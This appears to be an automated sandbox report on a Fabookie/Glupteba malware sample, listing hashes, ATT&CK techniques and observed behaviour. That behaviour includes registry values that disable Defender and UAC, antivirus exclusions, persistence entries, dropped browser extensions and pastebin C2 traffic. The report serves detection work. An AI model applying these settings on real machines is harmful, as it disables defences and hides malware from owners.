fabookie | 57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d

Analysis

max time kernel
300s
max time network
294s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
04/02/2024, 03:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe
Size

177KB
MD5

05e32cf85ff2c9c7bc92d6b751c02b1b
SHA1

95e91a3893640d9f9dd80cf5f0f820de54fccd2a
SHA256

57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d
SHA512

fc81e09eedb9ca907ab54cebe0f3f54cebc86f36fe036dcf0a97c131ccc5ae67832dbe902ae470b23c0dad62708555f5a4c2b4a9a71592ba5d42ee868322ed67
SSDEEP

3072:7gMyg1MbPUWdfkUXjqYffa6R2sChyJz2OgpnGaxNTgiqOweoUEMF98sDMOSx:sgw8WdxTqcfaO2sbJbgvxNTg0weJ/W

Score

10^/10

fabookie glupteba discovery dropper evasion loader persistence rootkit spyware stealer trojan upx

Malware Config

Signatures

Detect Fabookie payload 2 IoCs

resource	yara_rule
behavioral1/memory/1852-414-0x0000000003540000-0x000000000366C000-memory.dmp	family_fabookie
behavioral1/memory/1852-422-0x0000000003540000-0x000000000366C000-memory.dmp	family_fabookie

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 1 IoCs

resource	yara_rule
behavioral1/memory/544-192-0x0000000002B30000-0x000000000341B000-memory.dmp	family_glupteba

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	conhost.exe

Windows security bypass 2 TTPs 50 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KCGdmeQdU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FohpjzYDshfCC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RZfGRCgJsrDIEOco = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hgFvgKbJayUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\uqeRQcQeSVSWnHVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FohpjzYDshfCC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hgFvgKbJayUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IoHaAJhEDYhU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\lhuGc8cD8YBgMslw3CZs4Nqs.exe = "0"	lhuGc8cD8YBgMslw3CZs4Nqs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RZfGRCgJsrDIEOco = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IoHaAJhEDYhU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KCGdmeQdU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RZfGRCgJsrDIEOco = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Ahzn2Szwr26hfrPXyZRPFZkG.exe = "0"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\uqeRQcQeSVSWnHVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RZfGRCgJsrDIEOco = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe = "0"	57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	Ahzn2Szwr26hfrPXyZRPFZkG.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
100	2900	rundll32.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2844	netsh.exe
2616	netsh.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Control Panel\International\Geo\Nation	JUNRlIz.exe

Drops startup file 8 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\O5wIQhpWgLP7UEf4RlQSymbg.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CKLB7On53h12fq7Foi6NaiQn.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qYRxbFWhFHxAovei7jZ0tgvr.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5Dko4QvrCUvoej3yhR41KSvY.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BgCvBfSl7tNkEwscYTOTD25q.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rcZBdNwX1Cz8vI68m250iIBr.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NiQvhTUtNTg97Gy0ZDO1nmki.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CHcPwIDQzspiKJ4r7CublNdr.bat	CasPol.exe

Executes dropped EXE 19 IoCs

pid	Process
540	cmd.exe
544	conhost.exe
1872	3abumA8EPhmpkupXkwlsWKNH.exe
2956	Btpmb8l6OLnsIVBHYXzcfv46.exe
1520	Ahzn2Szwr26hfrPXyZRPFZkG.exe
884	lhuGc8cD8YBgMslw3CZs4Nqs.exe
2340	Fku5AId0LuZ4E8yzod75BtEi.exe
700	conhost.exe
2960	Install.exe
2156	csrss.exe
1852	OQrMVozqayLadUiGGxpM2SWK.exe
2556	Install.exe
1628	patch.exe
2596	injector.exe
1716	wxzSv0RPCLFiIJpPm8GSlIWp.exe
2268	eYLayuZ.exe
2848	windefender.exe
2348	windefender.exe
1948	JUNRlIz.exe

Loads dropped DLL 40 IoCs

pid	Process
1800	CasPol.exe
1800	CasPol.exe
1800	CasPol.exe
1800	CasPol.exe
1800	CasPol.exe
1872	3abumA8EPhmpkupXkwlsWKNH.exe
1800	CasPol.exe
2956	Btpmb8l6OLnsIVBHYXzcfv46.exe
2956	Btpmb8l6OLnsIVBHYXzcfv46.exe
2956	Btpmb8l6OLnsIVBHYXzcfv46.exe
1800	CasPol.exe
2340	Fku5AId0LuZ4E8yzod75BtEi.exe
2956	Btpmb8l6OLnsIVBHYXzcfv46.exe
2960	Install.exe
2960	Install.exe
2960	Install.exe
1520	Ahzn2Szwr26hfrPXyZRPFZkG.exe
1520	Ahzn2Szwr26hfrPXyZRPFZkG.exe
1800	CasPol.exe
2960	Install.exe
2556	Install.exe
2556	Install.exe
2556	Install.exe
864	Process not Found
1872	3abumA8EPhmpkupXkwlsWKNH.exe
1628	patch.exe
1628	patch.exe
1628	patch.exe
1628	patch.exe
1628	patch.exe
2156	csrss.exe
1800	CasPol.exe
1800	CasPol.exe
1628	patch.exe
1628	patch.exe
1628	patch.exe
2900	rundll32.exe
2900	rundll32.exe
2900	rundll32.exe
2900	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0031000000018646-199.dat	upx
behavioral1/memory/1872-209-0x0000000000110000-0x00000000005F8000-memory.dmp	upx
behavioral1/files/0x0031000000018646-201.dat	upx
behavioral1/files/0x0031000000018646-202.dat	upx
behavioral1/memory/1872-432-0x0000000000110000-0x00000000005F8000-memory.dmp	upx
behavioral1/memory/2848-484-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/2348-486-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/2848-485-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/2348-502-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/2348-523-0x0000000000400000-0x00000000008DF000-memory.dmp	upx

Windows security modification 2 TTPs 13 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\lhuGc8cD8YBgMslw3CZs4Nqs.exe = "0"	lhuGc8cD8YBgMslw3CZs4Nqs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Ahzn2Szwr26hfrPXyZRPFZkG.exe = "0"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions	57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe = "0"	57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	cmd.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	lhuGc8cD8YBgMslw3CZs4Nqs.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe

Checks for any installed AV software in registry 1 TTPs 1 IoCs

Security Software Discovery

T1518.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast	Install.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	JUNRlIz.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json	JUNRlIz.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
5	pastebin.com
6	pastebin.com

Manipulates WinMonFS driver. 1 IoCs

Roottkits write to WinMonFS to hide directories/files from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMonFS	csrss.exe

Modifies boot configuration data using bcdedit 1 IoCs

pid	Process
300	bcdedit.exe

Drops file in System32 directory 21 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	JUNRlIz.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	eYLayuZ.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	conhost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	JUNRlIz.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	JUNRlIz.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_8CFD0F060456F65ABC9E95E41A1F781C	JUNRlIz.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_D50E9269859FFB5A738F673D82E63752	JUNRlIz.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_5715DE550AA680C2FBA40D3A4F6608E9	JUNRlIz.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_5715DE550AA680C2FBA40D3A4F6608E9	JUNRlIz.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	eYLayuZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	rundll32.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	JUNRlIz.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	JUNRlIz.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	JUNRlIz.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_8CFD0F060456F65ABC9E95E41A1F781C	JUNRlIz.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_D50E9269859FFB5A738F673D82E63752	JUNRlIz.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	eYLayuZ.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 700 set thread context of 1800	700	conhost.exe	30

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	lhuGc8cD8YBgMslw3CZs4Nqs.exe
File opened (read-only)	\??\VBoxMiniRdrDN	Ahzn2Szwr26hfrPXyZRPFZkG.exe

Drops file in Program Files directory 13 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR\mpwJHFM.dll	JUNRlIz.exe
File created	C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR\nwEoeMi.xml	JUNRlIz.exe
File created	C:\Program Files (x86)\FohpjzYDshfCC\RFVLhGx.xml	JUNRlIz.exe
File created	C:\Program Files (x86)\KCGdmeQdU\epaRtk.dll	JUNRlIz.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	JUNRlIz.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	JUNRlIz.exe
File created	C:\Program Files (x86)\hgFvgKbJayUn\WikVRHL.dll	JUNRlIz.exe
File created	C:\Program Files (x86)\KCGdmeQdU\fcltJmr.xml	JUNRlIz.exe
File created	C:\Program Files (x86)\FohpjzYDshfCC\ojxihoQ.dll	JUNRlIz.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	JUNRlIz.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	JUNRlIz.exe
File created	C:\Program Files (x86)\IoHaAJhEDYhU2\uehpZamRStCkJ.dll	JUNRlIz.exe
File created	C:\Program Files (x86)\IoHaAJhEDYhU2\BzYRdwG.xml	JUNRlIz.exe

Drops file in Windows directory 14 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\YsLxjqvMZrWymyIEG.job	schtasks.exe
File created	C:\Windows\unins000.dat	conhost.exe
File opened for modification	C:\Windows\rss	Ahzn2Szwr26hfrPXyZRPFZkG.exe
File opened for modification	C:\Windows\rss	lhuGc8cD8YBgMslw3CZs4Nqs.exe
File created	C:\Windows\rss\csrss.exe	lhuGc8cD8YBgMslw3CZs4Nqs.exe
File created	C:\Windows\Logs\CBS\CbsPersist_20240204034220.cab	reg.exe
File created	C:\Windows\Tasks\bwKBwqZYjkqxftWshF.job	conhost.exe
File created	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\Tasks\EtrQGzrpWMpnyWxNE.job	schtasks.exe
File created	C:\Windows\is-APIAD.tmp	conhost.exe
File opened for modification	C:\Windows\unins000.dat	conhost.exe
File created	C:\Windows\rss\csrss.exe	Ahzn2Szwr26hfrPXyZRPFZkG.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\Tasks\SMPpzaSdDqsJvHF.job	schtasks.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
700	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 15 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2628	schtasks.exe
2416	schtasks.exe
2592	schtasks.exe
2392	schtasks.exe
1600	schtasks.exe
1616	schtasks.exe
1196	schtasks.exe
1312	schtasks.exe
1136	schtasks.exe
2276	schtasks.exe
2328	schtasks.exe
2772	schtasks.exe
2580	schtasks.exe
1600	schtasks.exe
3052	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-432 = "Iran Standard Time"	windefender.exe
